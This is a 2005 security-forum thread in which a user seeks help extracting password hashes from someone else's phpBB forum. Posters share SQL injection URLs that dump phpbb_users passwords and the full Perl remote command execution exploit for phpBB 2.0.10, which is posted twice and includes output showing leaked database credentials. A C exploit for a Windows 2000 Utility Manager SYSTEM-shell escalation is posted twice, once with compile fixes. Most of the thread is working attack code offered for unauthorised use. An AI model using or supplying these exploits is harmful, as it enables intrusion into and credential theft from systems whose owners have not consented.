Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 55
Members: 0
Total: 55
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Hacking phpBB (heres a challenge)
Post new topicReply to topic View previous topic :: View next topic
Hacking phpBB (heres a challenge)
PostPosted: Wed Feb 23, 2005 11:47 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Hey.
I found quite a few phpBB exploits. I'm trying to get the hash off of this site but the exploits I've tried wont work. The site uses MS SQL 2000 and IIS. PHPBB 2.0.3 the forums are highly modified but the database is still intact. These are the ones I've tried:

http://site.com/phpbb/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 5/*

http://site.com/phpbb/search.php?search_id=1%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[2]/*


The second requires Mysql.
I have no idea what exploit to use. Can someone help?
I don't have the resources and time to set up perl so perl exploits wont work for me.
Any help?
Is there an exploit for MSSQL to remotely backup this sites Database on my computer?
If anyone wants to have a crack for me PM me and I'll give you the site details.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Wed Feb 23, 2005 12:20 pm Reply with quote
ReFleX
Active user
Active user
Joined: Nov 05, 2004
Posts: 39
Location: ARGENTINA!




Do you tried the phpbb exploit with highlight issue???? you can execute commands.... modify database and even include files. Look at phpbb forum and take a look at vulns in phpbb 2.0.10 The exploit are down, I'm going to upload the exploit again as soon as possible

see ya
View user's profile Send private message Visit poster's website
PostPosted: Wed Feb 23, 2005 12:38 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




If thats the one your talking about well I said I dont have the time or resources. I'm on a 500mhz laptop. Its just no fun with out my PC back home in NZ.


#!/usr/bin/perl

use IO::Socket;

## @@@@@@@ @@@ @@@ @@@@@@ @@@ @@@
## @@! @@@ @@! @@@ !@@ @@! @@@
## @!@!!@! @!@ !@! !@@!! @!@!@!@!
## !!: :!! !!: !!! !:! !!: !!!
## : : : :.:: : ::.: : : : :
##
## phpBB <= 2.0.10 remote commands exec exploit
## based on http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0
## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example...
## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819
## The third issue, search highlighting, has been checked by us several times and we can do
## nothing with it at all. Again, that particular group admit likewise. In a future release
## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our
## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to
## be cause for an immediate release.
## heh...
##
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "ls -la"
## *** CMD: [ ls -la ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## total 507
## drwxr-xr-x 12 dhn phpbb 896 Oct 13 18:23 .
## drwxrwxr-x 19 root phpbb 1112 Nov 12 15:08 ..
## drwxr-xr-x 2 dhn phpbb 152 Oct 13 18:23 CVS
## drwxr-xr-x 3 dhn phpbb 944 Jul 19 15:17 admin
## drwxrwxrwx 5 dhn phpbb 160 Aug 14 21:19 cache
## -rw-r--r-- 1 dhn phpbb 44413 Mar 11 2004 catdb.php
## -rw-r--r-- 1 dhn phpbb 5798 Jul 19 15:17 common.php
## -rw-r--r-- 1 root root 264 Jul 2 08:05 config.php
## drwxr-xr-x 3 dhn phpbb 136 Jun 24 06:40 db
## drwxr-xr-x 3 dhn phpbb 320 Jul 19 15:17 docs
## -rw-r--r-- 1 dhn phpbb 814 Oct 30 2003 extension.inc
## -rw-r--r-- 1 dhn phpbb 3646 Jul 10 04:21 faq.php
## drwxr-xr-x 2 dhn phpbb 96 Aug 12 14:59 files
## -rw-r--r-- 1 dhn phpbb 45642 Jul 12 12:42 groupcp.php
## drwxr-xr-x 7 dhn phpbb 240 Aug 12 16:22 images
## drwxr-xr-x 3 dhn phpbb 1048 Jul 19 15:17 includes
## -rw-r--r-- 1 dhn phpbb 14518 Jul 10 04:21 index.php
## drwxr-xr-x 60 dhn phpbb 2008 Sep 27 01:54 language
## -rw-r--r-- 1 dhn phpbb 7481 Jul 19 15:17 login.php
## -rw-r--r-- 1 dhn phpbb 12321 Mar 4 2004 memberlist.php
## -rw-r--r-- 1 dhn phpbb 37639 Jul 10 04:21 modcp.php
## -rw-r--r-- 1 dhn phpbb 45945 Mar 24 2004 mods_manager.php
## -rw-r--r-- 1 dhn phpbb 34447 Jul 10 04:21 posting.php
## -rw-r--r-- 1 dhn phpbb 72580 Jul 10 04:21 privmsg.php
## -rw-r--r-- 1 dhn phpbb 4190 Jul 12 12:42 profile.php
## -rw-r--r-- 1 dhn phpbb 16276 Oct 13 18:23 rules.php
## -rw-r--r-- 1 dhn phpbb 42694 Jul 19 15:17 search.php
## drwxr-xr-x 4 dhn phpbb 136 Jun 24 06:41 templates
## -rw-r--r-- 1 dhn phpbb 23151 Mar 13 2004 viewforum.php
## -rw-r--r-- 1 dhn phpbb 7237 Jul 10 04:21 viewonline.php
## -rw-r--r-- 1 dhn phpbb 45151 Jul 10 04:21 viewtopic.php
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cat config.php"
## *** CMD: [ cat config.php ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## $dbms = "mysql";
## $dbhost = "localhost";
## $dbname = "phpbb";
## $dbuser = "phpbb";
## $dbpasswd = "phpBB_R0cKs";
## $table_prefix = "phpbb_";
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## rocksss....
##
## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## fucking lamaz...
##
## ccteam.ru
## $dbname = "ccteam_phpbb2";
## $dbuser = "ccteam_userphpbb";
## $dbpasswd = "XCbRsoy1";
##
## eat this dude...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if (@ARGV < 4)
{
print q(############################################################
phpBB <=2.0.10 remote command execution exploit
by RusH security team // www.rst.void.ru
############################################################
usage:
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
params:
[URL] - server url e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
############################################################
);
exit;
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%
5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]
CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

$on = 0;

while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

### EOF ###

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Wed Feb 23, 2005 3:47 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




shai-tan wrote:
If thats the one your talking about well I said I dont have the time or resources. I'm on a 500mhz laptop. Its just no fun with out my PC back home in NZ.


#!/usr/bin/perl

use IO::Socket;

## @@@@@@@ @@@ @@@ @@@@@@ @@@ @@@
## @@! @@@ @@! @@@ !@@ @@! @@@
## @!@!!@! @!@ !@! !@@!! @!@!@!@!
## !!: :!! !!: !!! !:! !!: !!!
## : : : :.:: : ::.: : : : :
##
## phpBB <= 2.0.10 remote commands exec exploit
## based on http://securityfocus.com/archive/1/380993/2004-11-07/2004-11-13/0
## succesfully tested on: 2.0.6 , 2.0.8 , 2.0.9 , 2.0.10
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example...
## he-he-he ... read http://www.phpbb.com/phpBB/viewtopic.php?t=239819
## The third issue, search highlighting, has been checked by us several times and we can do
## nothing with it at all. Again, that particular group admit likewise. In a future release
## of 2.0.x we will eliminate the problem once and for all, but as noted it cannot (to our
## knowledge and as noted, testing) be taken advantage of and thus is not considered by us to
## be cause for an immediate release.
## heh...
##
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "ls -la"
## *** CMD: [ ls -la ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## total 507
## drwxr-xr-x 12 dhn phpbb 896 Oct 13 18:23 .
## drwxrwxr-x 19 root phpbb 1112 Nov 12 15:08 ..
## drwxr-xr-x 2 dhn phpbb 152 Oct 13 18:23 CVS
## drwxr-xr-x 3 dhn phpbb 944 Jul 19 15:17 admin
## drwxrwxrwx 5 dhn phpbb 160 Aug 14 21:19 cache
## -rw-r--r-- 1 dhn phpbb 44413 Mar 11 2004 catdb.php
## -rw-r--r-- 1 dhn phpbb 5798 Jul 19 15:17 common.php
## -rw-r--r-- 1 root root 264 Jul 2 08:05 config.php
## drwxr-xr-x 3 dhn phpbb 136 Jun 24 06:40 db
## drwxr-xr-x 3 dhn phpbb 320 Jul 19 15:17 docs
## -rw-r--r-- 1 dhn phpbb 814 Oct 30 2003 extension.inc
## -rw-r--r-- 1 dhn phpbb 3646 Jul 10 04:21 faq.php
## drwxr-xr-x 2 dhn phpbb 96 Aug 12 14:59 files
## -rw-r--r-- 1 dhn phpbb 45642 Jul 12 12:42 groupcp.php
## drwxr-xr-x 7 dhn phpbb 240 Aug 12 16:22 images
## drwxr-xr-x 3 dhn phpbb 1048 Jul 19 15:17 includes
## -rw-r--r-- 1 dhn phpbb 14518 Jul 10 04:21 index.php
## drwxr-xr-x 60 dhn phpbb 2008 Sep 27 01:54 language
## -rw-r--r-- 1 dhn phpbb 7481 Jul 19 15:17 login.php
## -rw-r--r-- 1 dhn phpbb 12321 Mar 4 2004 memberlist.php
## -rw-r--r-- 1 dhn phpbb 37639 Jul 10 04:21 modcp.php
## -rw-r--r-- 1 dhn phpbb 45945 Mar 24 2004 mods_manager.php
## -rw-r--r-- 1 dhn phpbb 34447 Jul 10 04:21 posting.php
## -rw-r--r-- 1 dhn phpbb 72580 Jul 10 04:21 privmsg.php
## -rw-r--r-- 1 dhn phpbb 4190 Jul 12 12:42 profile.php
## -rw-r--r-- 1 dhn phpbb 16276 Oct 13 18:23 rules.php
## -rw-r--r-- 1 dhn phpbb 42694 Jul 19 15:17 search.php
## drwxr-xr-x 4 dhn phpbb 136 Jun 24 06:41 templates
## -rw-r--r-- 1 dhn phpbb 23151 Mar 13 2004 viewforum.php
## -rw-r--r-- 1 dhn phpbb 7237 Jul 10 04:21 viewonline.php
## -rw-r--r-- 1 dhn phpbb 45151 Jul 10 04:21 viewtopic.php
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cat config.php"
## *** CMD: [ cat config.php ]
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## $dbms = "mysql";
## $dbhost = "localhost";
## $dbname = "phpbb";
## $dbuser = "phpbb";
## $dbpasswd = "phpBB_R0cKs";
## $table_prefix = "phpbb_";
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## rocksss....
##
## P.S. this code public after phpbb.com was defaced by really stupid man with nickname tristam...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## fucking lamaz...
##
## ccteam.ru
## $dbname = "ccteam_phpbb2";
## $dbuser = "ccteam_userphpbb";
## $dbpasswd = "XCbRsoy1";
##
## eat this dude...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

if (@ARGV < 4)
{
print q(############################################################
phpBB <=2.0.10 remote command execution exploit
by RusH security team // www.rst.void.ru
############################################################
usage:
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
params:
[URL] - server url e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
############################################################
);
exit;
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$topic = $ARGV[2];
$cmd = $ARGV[3];

$serv =~ s/(http:\/\/)//eg;
print "*** CMD: [ $cmd ]\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

$cmd=~ s/(.*);$/$1/eg;
$cmd=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$topic=~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$path = $dir;
$path .= 'viewtopic.php?t=';
$path .= $topic;
$path .= '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20';
$path .= $cmd;
$path .= '%3B%20%65%63%68%6F%20%5F%45%4E%44%5F';
$path .= '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%
5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]
CONNECT FAILED\r\n";

print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

$on = 0;

while ($answer = <$socket>)
{
if ($answer =~ /^_END_/) { print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; exit(); }
if ($on == 1) { print " $answer"; }
if ($answer =~ /^_START_/) { $on = 1; }
}

print "[-] EXPLOIT FAILED\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";

### EOF ###



men this is old and obsolete for you computer search phpbbexpl.exe
View user's profile Send private message Visit poster's website
PostPosted: Thu Feb 24, 2005 10:43 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Just a question I searched google for phpbbexpl.exe but no results were found can I have a clue as to where I may find it?

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Thu Feb 24, 2005 11:15 am Reply with quote
shai-tan
Valuable expert
Valuable expert
Joined: Feb 22, 2005
Posts: 477




Windows 2000 Universal language Utility Manager Exploit (MS04-019)
Can someone please complie this for me? I think its C++. I don't have time to study it


/**************************************************************************
****C****O****R****O****M****P****U****T****E****R****2****0****0***4****
** [Crpt] Utility Manager exploit v1.666 modified by kralor [Crpt] **
***************************************************************************
** It gets system language and sets windows names to work on any win2k Razz **
** Feel free to add other languages Smile **
** You know where we are.. **
****C****O****R****O****M****P****U****T****E****R****2****0****0***4****
**************************************************************************/
/* original disclaimer */
//by Cesar Cerrudo sqlsec>at<yahoo.com
//Local elevation of priviliges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.
/* end of original disclaimer */

#include <stdio.h>
#include <windows.h>

struct {
int id;
char *utilman;
char *winhelp;
char *open;
} lang[] = {
{ 0x0c,"Gestionnaire d'utilitaires","aide de Windows","Ouvrir" }, /* French */
{ 0x09,"Utility manager","Windows Help","Open" } /* English */
};

void print_lang(int id)
{
char *lang_list[] = {"Neutral","Arabic","Bulgarian","Catalan","Chinese","Czech",
"Danish","German","Greek","English","Spanish","Finnish",
"French","Hebrew","Hungarian","Icelandic","italian",
"Japanese","Korean","Dutch","Norwegian","Polish",
"Portuguese","Romanian","Russian","Croatian","Serbian",
"Slovak","Albanian","Swedish","Thai","Turkish","Urdu",
"Indonesian","Ukrainian","Belarusian","Slovenian",
"Estonian","Latvian","Lithuanian","Farsi","Vietnamese",
"Armenian","Azeri","Basque","FYRO Macedonian","Afrikaans",
"Georgian","Faeroese","Hindi","Malay","Kazak","Kyrgyz",
"Swahili","Uzbek","Tatar","Not supported","Punjabi",
"Gujarati","Not supported","Tamil","Telugu","Kannada",
"Not supported","Not supported","Marathi","Sanskrit",
"Mongolian","Galician the best Wink","Konkani","Not supported",
"Not supported","Syriac","Not supported","Not supported",
"Divehi","Invariant"};
printf("%s\r\n",lang_list[id]);
return;
}

int set_lang(void)
{
unsigned int lang_usr,lang_sys,id;

id=GetSystemDefaultLangID();
lang_sys=PRIMARYLANGID(id);
id=GetUserDefaultLangID();
lang_usr=PRIMARYLANGID(id);
if(lang_usr!=lang_sys) {
printf("warning: user language differs from system language\r\n\r\n");
printf("1. system : ");print_lang(lang_sys);
printf("2. user : ");print_lang(lang_usr);printf("Select(1-2): ");
id=getch();
if(id!=49&&id!=50) {
printf("wrong choice '%c', leaving.\r\n",id);
exit(0);
}
if(id==49) {
printf("system language\r\n");
return lang_sys;
}
else
printf("user language\r\n");
}
return lang_usr;
}

void banner()
{
system("cls");
printf("\r\n\r\n\t[Crpt] Utility Manager exploit v1.666 modified by kralor [Crpt]\r\n");
printf("\t\t\t base code by Cesar Cerrudo\r\n");
printf("\t\t\t You know where we are...\r\n\r\n");
return;
}

int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
char cmd[]="%windir%\\system32\\cmd.ex?";
unsigned int i;
int lang_id;

banner();

printf("[+] Gathering system language information\r\n");
lang_id=set_lang();
printf("[+] OK language ...");print_lang(lang_id);

for(i=0;i<sizeof(lang)/sizeof(lang[0]);i++)
if(lang[i].id==lang_id)
break;
if(i==sizeof(lang)/sizeof(lang[0])) {
printf("error: undefined language.\r\n");
return -1;
}
printf("[+] Trying to execute program with SYSTEM priviliges through utilman.exe\r\n");
printf("prog: %s\r\n",cmd);
// run utility manager
// system("utilman.exe /start");
WinExec("utilman.exe /start",SW_HIDE);
Sleep(1000);

lHandle=FindWindow(NULL, lang[i].utilman);
if (!lHandle) {
printf("error: unable to start utilman.exe.\r\n");
return 0;
}

PostMessage(lHandle,0x313,0,0); //=right click on the app button in the
//taskbar or Alt+Space Bar

Sleep(100);

SendMessage(lHandle,0x365,0,0x1); //send WM_COMMANDHELP 0x0365
lParam must be<>NULL
Sleep(300);

SendMessage (FindWindow(NULL, lang[i].winhelp), WM_IME_KEYDOWN, VK_RETURN, 0);
Sleep(500);

// find open file dialog window
lHandle = FindWindow("#32770",lang[i].open);
// get input box handle
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);

// set text to filter listview to display only cmd.exe
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)cmd);
Sleep(800);

// send return
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

//get navigation bar handle
lHandle2 = GetDlgItem(lHandle, 0x4A0);

//send tab
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
//get list view handle
lHandle2 = GetDlgItem(lHandle2, 0x1);

SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
Sleep(500);

//popup context menu
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);

// get context menu handle
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);

SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window
Sleep(500);

SendMessage (FindWindow(NULL, lang[i].winhelp), WM_CLOSE, 0, 0);// close
open error window
SendMessage (FindWindow(NULL, lang[i].utilman), WM_CLOSE, 0, 0);// close
utilitymanager
return 0;
}

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Thu Feb 24, 2005 4:11 pm Reply with quote
HaCkZataN
Regular user
Regular user
Joined: Feb 23, 2005
Posts: 11




i did have to errores but minors, because they forgat to put backslashes //

Code:
/**************************************************************************
****C****O****R****O****M****P****U****T****E****R****2****0****0***4****
** [Crpt] Utility Manager exploit v1.666 modified by kralor [Crpt] **
***************************************************************************
** It gets system language and sets windows names to work on any win2k Razz **
** Feel free to add other languages Smile **
** You know where we are.. **
****C****O****R****O****M****P****U****T****E****R****2****0****0***4****
**************************************************************************/
/* original disclaimer */
//by Cesar Cerrudo sqlsec>at<yahoo.com
//Local elevation of priviliges exploit for Windows 2K Utility Manager (second one!!!!)
//Gives you a shell with system privileges
//If you have problems try changing Sleep() values.
/* end of original disclaimer */

#include <stdio.h>
#include <windows.h>

struct {
int id;
char *utilman;
char *winhelp;
char *open;
} lang[] = {
{ 0x0c,"Gestionnaire d'utilitaires","aide de Windows","Ouvrir" }, /* French */
{ 0x09,"Utility manager","Windows Help","Open" } /* English */
};

void print_lang(int id)
{
char *lang_list[] = {"Neutral","Arabic","Bulgarian","Catalan","Chinese","Czech",
"Danish","German","Greek","English","Spanish","Finnish",
"French","Hebrew","Hungarian","Icelandic","italian",
"Japanese","Korean","Dutch","Norwegian","Polish",
"Portuguese","Romanian","Russian","Croatian","Serbian",
"Slovak","Albanian","Swedish","Thai","Turkish","Urdu",
"Indonesian","Ukrainian","Belarusian","Slovenian",
"Estonian","Latvian","Lithuanian","Farsi","Vietnamese",
"Armenian","Azeri","Basque","FYRO Macedonian","Afrikaans",
"Georgian","Faeroese","Hindi","Malay","Kazak","Kyrgyz",
"Swahili","Uzbek","Tatar","Not supported","Punjabi",
"Gujarati","Not supported","Tamil","Telugu","Kannada",
"Not supported","Not supported","Marathi","Sanskrit",
"Mongolian","Galician the best Wink","Konkani","Not supported",
"Not supported","Syriac","Not supported","Not supported",
"Divehi","Invariant"};
printf("%s\r\n",lang_list[id]);
return;
}

int set_lang(void)
{
unsigned int lang_usr,lang_sys,id;

id=GetSystemDefaultLangID();
lang_sys=PRIMARYLANGID(id);
id=GetUserDefaultLangID();
lang_usr=PRIMARYLANGID(id);
if(lang_usr!=lang_sys) {
printf("warning: user language differs from system language\r\n\r\n");
printf("1. system : ");print_lang(lang_sys);
printf("2. user : ");print_lang(lang_usr);printf("Select(1-2): ");
id=getch();
if(id!=49&&id!=50) {
printf("wrong choice '%c', leaving.\r\n",id);
exit(0);
}
if(id==49) {
printf("system language\r\n");
return lang_sys;
}
else
printf("user language\r\n");
}
return lang_usr;
}

void banner()
{
system("cls");
printf("\r\n\r\n\t[Crpt] Utility Manager exploit v1.666 modified by kralor [Crpt]\r\n");
printf("\t\t\t base code by Cesar Cerrudo\r\n");
printf("\t\t\t You know where we are...\r\n\r\n");
return;
}

int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
POINT point;
char cmd[]="%windir%\\system32\\cmd.ex?";
unsigned int i;
int lang_id;

banner();

printf("[+] Gathering system language information\r\n");
lang_id=set_lang();
printf("[+] OK language ...");print_lang(lang_id);

for(i=0;i<sizeof(lang)/sizeof(lang[0]);i++)
if(lang[i].id==lang_id)
break;
if(i==sizeof(lang)/sizeof(lang[0])) {
printf("error: undefined language.\r\n");
return -1;
}
printf("[+] Trying to execute program with SYSTEM priviliges through utilman.exe\r\n");
printf("prog: %s\r\n",cmd);
// run utility manager
// system("utilman.exe /start");
WinExec("utilman.exe /start",SW_HIDE);
Sleep(1000);

lHandle=FindWindow(NULL, lang[i].utilman);
if (!lHandle) {
printf("error: unable to start utilman.exe.\r\n");
return 0;
}

PostMessage(lHandle,0x313,0,0); //=right click on the app button in the
//taskbar or Alt+Space Bar

Sleep(100);

SendMessage(lHandle,0x365,0,0x1); //send WM_COMMANDHELP 0x0365
//lParam must be<>NULL
Sleep(300);

SendMessage (FindWindow(NULL, lang[i].winhelp), WM_IME_KEYDOWN, VK_RETURN, 0);
Sleep(500);

// find open file dialog window
lHandle = FindWindow("#32770",lang[i].open);
// get input box handle
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);

// set text to filter listview to display only cmd.exe
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)cmd);
Sleep(800);

// send return
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

//get navigation bar handle
lHandle2 = GetDlgItem(lHandle, 0x4A0);

//send tab
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
//get list view handle
lHandle2 = GetDlgItem(lHandle2, 0x1);

SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
Sleep(500);

//popup context menu
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);

// get context menu handle
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);

SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

